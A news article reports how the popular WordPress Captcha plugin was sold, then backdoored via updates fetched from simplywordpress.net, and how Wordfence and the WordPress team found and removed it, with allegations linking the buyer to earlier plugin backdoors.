WordPress CMS dashboard

A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened and removed this plugin from the official WordPress Plugins repository, also providing clean versions for affected customers.

Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.

Plugin sold in September, backdoored in December

BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company's site.

Exactly three months after the sale, the plugin's new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository (against WordPress.org rules). This sneaky update package would install a backdoor on sites using the plugin.

"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," says Matt Barry, Wordfence security researcher. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."

Further, there's also code to trigger a clean update that removes any traces of the back door, just in case the attacker decides to erase all his tracks.

Backdoor discovered by accident

Initially, the update didn't catch anyone's eye and we presume it would have continued to fly under the radar even today.

What exposed the backdoor was not a user complaint but a copyright claim from the WordPress team. A few days ago, the WordPress team removed the Captcha plugin from the official WordPress.org website because the plugin's new author had used the "WordPress" trademark in his name and plugin branding.

The plugin's removal from the WordPress site alerted the security team at Wordfence, a company that provides a powerful Web Application Firewall (WAF) for WordPress sites.

"Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related," Barry says, explaining how they came to review the plugin's code and spot the backdoor.

WordPress team ships plugin version without malicious code

Once they spotted the backdoor, Wordfence notified the WordPress security team, who then put together a clean version of the Captcha plugin (version 4.4.5), which they immediately started to force-install on all affected websites, removing backdoored versions from users' sites. Over 100,000 sites received the clean version of the Captcha plugin over the weekend, the WordPress team said.

Since first coming across the backdoor, the Wordfence team has relentlessly spent its time looking into the dealings of the Simply WordPress company.

Experts say they've discovered backdoored update packages on the simplywordpress.net domain for other WordPress plugins such as:

    Covert me Popup
    Death To Comments
    Human Captcha
    Smart Recaptcha
    Social Exchange

None of these names appear to correspond to plugins hosted on the official WordPress repository.

Simply WordPress domain hosting other malicious code

Plugin's new author has done this before

Nonetheless, clues in the simplywordpress.net domain have put the Wordfence team on the trail of a known abuser they have met and exposed in the past.

According to Barry, the Simply WordPress company appears to be connected to Mason Soiza, an individual they have previously linked to backdoors in the Display Widgets (+200,000 installs) and 404 to 301 (70,000 installs).

Wordfence claims Soiza has been buying WordPress plugins and adding backdoor code to each one. Soiza is allegedly using the backdoored versions to insert hidden backlinks to spammy domains, including for Payday Loans, a company he owns. The entire purpose of this business is to help Soiza's sites rank better in search results.

All these connections are explained in fine details in two WordFence reports, one detailing the recent Captcha backdoor, and another detailing past incidents.

Related Articles:

LOL: BabaYaga WordPress Malware Updates Your Site

Unpatched Flaw Disclosed in WordPress CMS Core

Hackers Find New Method of Installing Backdoored Plugins on WordPress Sites

Two Months Later, Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon 2

Spam Botnet Tracked Down to Malicious PHP Script Found on 5,000 Hacked Sites